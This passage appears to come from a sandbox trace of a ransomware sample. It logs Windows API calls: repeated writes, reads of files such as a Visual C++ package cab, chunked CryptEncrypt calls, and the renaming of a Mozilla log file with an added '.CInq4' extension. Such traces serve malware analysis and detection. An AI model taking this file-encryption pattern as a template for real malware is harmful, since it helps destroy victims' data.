lpOverlapped=0x0) returned 1 [0040.503] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.506] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.509] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.511] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.514] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.516] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.517] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.534] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.536] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.537] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.547] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.549] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.550] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.553] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.554] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.556] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.559] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.560] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.562] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.588] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.590] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.591] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.613] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.614] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.615] CreateFileW (lpFileName="c:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0040.616] CreateFileW (lpFileName="c:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0040.616] CloseHandle (hObject=0xd4) returned 1 [0040.616] CloseHandle (hObject=0xffffffff) returned 0 [0040.616] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0c10*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0c10*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.616] WriteFile (in: hFile=0xd4, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.616] WriteFile (in: hFile=0xd4, lpBuffer=0x37b9b0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x37b9b0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.617] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.618] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.618] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.618] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x24, lpOverlapped=0x0) returned 1 [0040.618] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x24, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x30) returned 1 [0040.618] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x30, lpOverlapped=0x0) returned 1 [0040.618] CloseHandle (hObject=0xd4) returned 1 [0040.618] CloseHandle (hObject=0xd8) returned 1 [0040.618] GetCurrentThreadId () returned 0xa80 [0040.618] GetCurrentThreadId () returned 0xa80 [0040.618] MoveFileW (lpExistingFileName="c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log"), lpNewFileName="c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log.CInq4" (normalized: "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log.cinq4")) returned 1 [0040.620] WriteFile (in: hFile=0xd8, lpBuffer=0x3a0db0*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0db0*, lpNumberOfBytesWritten=0x1cf810*=0x1cb, lpOverlapped=0x0) returned 1 [0040.622] WriteFile (in: hFile=0xd8, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x426, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x426, lpOverlapped=0x0) returned 1 [0040.623] WriteFile (in: hFile=0xd8, lpBuffer=0x3a0aa0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x1cf810, lpOverlapped=0x0 | out: lpBuffer=0x3a0aa0*, lpNumberOfBytesWritten=0x1cf810*=0x87, lpOverlapped=0x0) returned 1 [0040.624] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0040.625] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0040.625] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.651] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.651] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.651] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.651] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.651] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.651] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.651] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.651] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.652] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.652] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.652] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.652] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.652] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.652] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.652] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.652] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.652] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.652] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.652] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.652] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.653] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.653] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.653] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.653] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.653] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.653] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.653] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.653] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.653] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.653] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.654] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.654] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.654] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.654] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.654] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.654] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.654] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.654] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.654] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.654] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.654] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.654] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.654] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.654] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.654] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.654] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.654] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.654] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.654] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.654] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.655] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.655] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.655] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.655] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.655] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.655] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.655] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, 